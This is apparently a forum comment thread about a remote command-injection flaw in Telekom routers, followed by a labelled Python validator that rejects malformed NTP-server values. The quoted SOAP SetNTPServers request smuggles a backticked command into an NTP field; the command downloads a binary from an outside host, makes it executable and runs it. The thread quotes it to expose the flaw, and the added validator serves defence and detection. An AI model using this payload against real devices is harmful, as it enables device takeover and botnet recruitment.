What a joke. There needs to be criminal liability for this. No authentication, authorization, identification? Data passed straight to exec() and fucking backticks are executed?
Jeez, I hate Telekom routers. They're unstable pieces of crap (except the rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT support, these dungheap devices caused most of the problems.
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
   <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1>
   <NewNTPServer2></NewNTPServer2>
   <NewNTPServer3></NewNTPServer3>
   <NewNTPServer4></NewNTPServer4>
   <NewNTPServer5></NewNTPServer5>
  </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...
next version step Mirai?
https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...
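Added example, not part of any comment above and not the router vendor's code: an allow-list check for the NewNTPServerN fields of the SetNTPServers call quoted in the thread, usable as server-side validation or as a detection rule on captured request bodies. The function names and the sample request are assumptions constructed for illustration.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespace and element names as they appear in the request quoted in the thread.
TIME_NS = "urn:dslforum-org:service:Time:1"
FIELD = re.compile(r"NewNTPServer[1-5]")
# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Constructed sample request; the backticked value is a harmless placeholder.
SAMPLE = b"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`example-command`</NewNTPServer1>
<NewNTPServer2>ntp.example.net</NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"""


def is_valid_ntp_server(value):
    """Accept only an empty slot, an IP literal, or an RFC 1123 hostname."""
    if value == "":
        return True  # unused slots are sent empty
    # IPv6 zone IDs ("fe80::1%eth0") are free-form text in ipaddress, so refuse them.
    if "%" in value:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if len(value) > 253:
        return False
    return all(LABEL.fullmatch(label) for label in value.split("."))


def rejected_ntp_fields(soap_body):
    """Return (field, value) pairs of a SetNTPServers call that fail validation."""
    # For untrusted input in production, parse with a hardened parser such as defusedxml.
    root = ET.fromstring(soap_body)
    bad = []
    for call in root.iter("{%s}SetNTPServers" % TIME_NS):
        for child in call:
            if FIELD.fullmatch(child.tag) and not is_valid_ntp_server(child.text or ""):
                bad.append((child.tag, child.text))
    return bad
```

Validation of this kind only narrows the input; the accepted value should still be handed to the NTP client as a single argument (an argv array), never interpolated into a shell command string.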